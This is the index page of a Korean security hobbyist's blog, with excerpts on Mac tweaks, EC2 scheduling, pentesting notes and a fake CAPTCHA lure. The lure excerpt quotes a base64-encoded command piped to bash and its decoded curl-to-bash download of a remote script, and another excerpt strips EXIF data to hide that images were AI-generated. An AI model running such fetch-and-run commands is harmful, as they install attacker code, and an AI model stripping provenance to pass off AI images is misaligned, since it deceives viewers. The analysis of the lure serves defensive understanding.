| 일 | 월 | 화 | 수 | 목 | 금 | 토 |
|---|---|---|---|---|---|---|
| 1 | 2 | 3 | 4 | 5 | ||
| 6 | 7 | 8 | 9 | 10 | 11 | 12 |
| 13 | 14 | 15 | 16 | 17 | 18 | 19 |
| 20 | 21 | 22 | 23 | 24 | 25 | 26 |
| 27 | 28 | 29 | 30 |
- 안전결제
- Frida
- mitmproxy
- S3
- 변태는
- 모의해킹
- 많다..
- Malware Sample
- shell_gpt
- ChatGPT
- AWS
- 허리디스크
- react2shell
- aes
- ssrf
- 내부확산
- 쿠팡체험단
- cve-2025-55182
- Sequoia
- 척추관협착증
- ue4dumper
- jeb_mcp
- XSS
- EC2
- LFI
- 중고나라
- intelmac
- 취약점
- 네이버카페
- Today
- Total
목록전체 글 (263)
annyoung
유튜브 프리미엄을 인도로 열심히 잘쓰고 있었는데 18일 결제였다가 갑자기 23일에 취소 당하고 프리미엄이 끊겼다.열심히 구글링한 결과 다시 뚫긴했다만 1-2달 쓰고 정지당할 예정 ㅜㅜ 안녕 명예 인도인…
9/15 기준, 이번 쿠팡체험단은 50,000원 ~ 369,000원 128개 상품이었다.
8/27 기준, 이번 쿠팡체험단은 1,600원 ~ 347,100원 168개 상품이며 식품류였다.
맥북 프로 M5 Pro 깡통 기준으로 일일퀘스트나 간단하게 보스 잡을때 괜찮게 쓰고있는데, 공식 홈페이지에서 로그인하고 실행하는게 아닌 윈도우처럼 런처로 실행하는 방법을 적고자한다. 메이플 맥 베타 서비스는 GPTK(Game Porting Toolkit)을 통해 Wine으로 메이플을 포팅해서 베타 서비스를 운영하고 있는거 같다. 우선 공식홈페이지에서 제공하는 맥용 메이플을 설치하고 아래 쉘 스크립트는 maple.sh로 저장한다.#!/bin/sh# 넥슨플러그/네이티브앱 없이: 로그인창 + 게임 실행 통합WINE="/Library/Application Support/Nexon/Maple/MapleStory.app/Contents/SharedSupport/maplestory/bin/wine"export CX_..
Mac에서 비밀번호를 계속 입력하는게 귀찮아서 touch id로도 가능하지 않을까? 싶어서 찾아보니까 있더라..sudo 파일 수정sudo vi /etc/pam.d/sudosudo 파일 다음과 같이 수정# sudo: auth account password sessionauth include sudo_local#auth sufficient pam_smartcard.soauth sufficient pam_tid.soauth required pam_opendirectory.soaccount required pam_permit.sopassword required pam_deny.sosession r..
회사에서 운영중인 솔루션 악성 메일 훈련 서버와 콜센터(CRM) 서버가 있다. 이 둘의 특징은 24시간 켜놓기에는 너무 아깝다는 생각이 들기 때문에 다음과 같이 셋팅했다. 악성 메일훈련 서버: 평상시 OFF, 사용기간에만 사용자가 수동(채팅)으로 ON콜센터(CRM): 평일 08:00 ~ 19:00까지만 켜놓고 주말 및 공휴일은 OFF(스케줄링은 crontab 적용) openclaw skills는 다음과 같이 만들었다.(사실 AI 시키면 알아서 뚝딱 만들어준다)# EC2 제어test 인스턴스를 채팅으로 시작·중지·상태 조회한다.- 인스턴스 ID: `i-1234`- 리전: `ap-northeast-2`- AWS 프로파일: `test`- 스크립트: `/home/nopsled/.openclaw/workspace..
항상 내가 모의해킹하던 회사가 털렸다. 건너건너 들었는데 내가 항상 하는 해킹 방식이랑 비슷했지만 다른점이 하나 있었다.AI 에이전트가 시도때도 없이 어시스트하고 거의 사람은 컨펌하는 수준이라고 들었다. 손으로 찾다보니 A서비스에서 했던 시도를 생각도 못하고 C서비스에서도 못해봤는데 일관화가 필요할 것 같다. 내가 항상 했던 회사가 털리다니 착잡하다~..+추가: 어떤 트위터를 보고들 오시는지…. (댓글 부탁합니다…….)
GPT로 생성한 이미지의 exif 메타데이터를 확인해보면 떡하니 Ai로 만들었다고 나오게 된다. 어디에서 사용하던간에 Ai로 만든 이미지라는걸 걸리게 되면 저품질로 가는 지름길이다. 그렇기 때문에.. 파일명을 kakao에서 받은 이미지처럼 1차 변경해주고(원본 파일명을 수집하는 서비스도 있기 때문에), 다음과 같이 exiftool로 exif 메타데이터를 모두 지워준다.exiftool -all= ~/Downloads/KakaoTalk_Photo_2026-05-29-16-31-56.png 그리고 올리면 기본적인 우회가 된다.
어떤 웹 사이트에서 로봇이 아닌걸 증명해야 한다고 터미널에서 무언가 실행하라고 하길래 무슨 동작을할까 싶어서 살짝 찍먹해봤다. echo "Y3VybCAtcyAnaHR0c***[REMOVED]***2gnIHwgYmFzaA==" | base64 -d | bash 복사된 내용은 위와 같았고, base64로 인코딩된 문자열을 디코딩하여 bash 쉘로 실행해주는 역할을 하는데 디코딩하게되면 다음과 같은 내용이 나온다. curl -s 'https://***[REMOVED]***.digital/script.sh' | bash 마찬가지로 curl의 -s 옵션을 줬는데 slient mode로 output을 출력하지 않고 해당 script.sh를 다운로드 받아 bash 쉘로 실행하며 실행되는 내용은 다음과 같다. os..
